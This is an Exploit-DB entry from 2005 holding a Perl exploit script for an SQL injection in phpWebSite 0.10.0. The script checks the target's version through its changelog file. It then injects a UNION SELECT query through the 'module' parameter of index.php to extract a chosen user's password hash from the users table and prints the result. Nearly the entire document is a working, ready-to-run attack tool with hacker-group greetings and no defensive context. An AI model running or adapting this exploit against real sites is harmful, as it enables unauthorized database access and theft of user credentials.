phpWebSite 0.10.0 - 'module' SQL Injection

EDB-ID:

1217

Author:

RusH

Type:

webapps

Platform:

PHP

Published:

2005-09-15

#!/usr/bin/perl
use LWP::Simple;
 
$serv     =  $ARGV[0]; 
$path     =  $ARGV[1]; 
$name     =  $ARGV[2];
    
sub usage
 { 
    print "\nUsage: $0 [server] [path] [username] \n"; 
    print "sever    -  URL\n"; 
    print "path     -  path to index.php\n"; 
    print "username -  name register user\n\n"; 
    exit ();}  
 
sub work
 {
    print qq(
       --------------------------------- 
#==---[    phpWebSite SQL-injection     |
#==---[   tested ob phpWebSite-0.10.0   |
#==---[  Gr33tz: blf, 1dt.w0lf, Pengo,  |
#==---[       edisan, foster, whice     |
#==---[ (c)oded by x97Rang 2005 RST/GHC |
#==---[        http://rst.void.ru       |
#==---[          http://ghc.ru          |
       ---------------------------------\n\n);&chv;&board}
       
sub chv     
 {
    $ver  = sprintf("http://%s%s/docs/CHANGELOG.txt",$serv,$path);
    $getv = get "$ver";
if ($getv =~ /(phpWebSite-)(\d{1})\.(\d{1,2})\.(\d{1})/){print"[*] Version: $1$2.$3.$4\n";}}  
 
sub board 
 {
    $URL = sprintf("http://%s%s/index.php?module=%27+union+select+username,password+from+mod_users+where+username=%27$name%27/*",$serv,$path);   
    $content = get "$URL";
if ($content =~ /(\<b\>Search\&\#160\;)(\w{32})(\<\/b\>)/){&showh;}else{print "... One of those days :)\n";}}
 
sub showh
 {
    print "[*] User: $name\n";
    print "[*] Hash: $2\n\n";}
    
if (@ARGV != 3){&usage;}else{&work;}

# milw0rm.com [2005-09-15]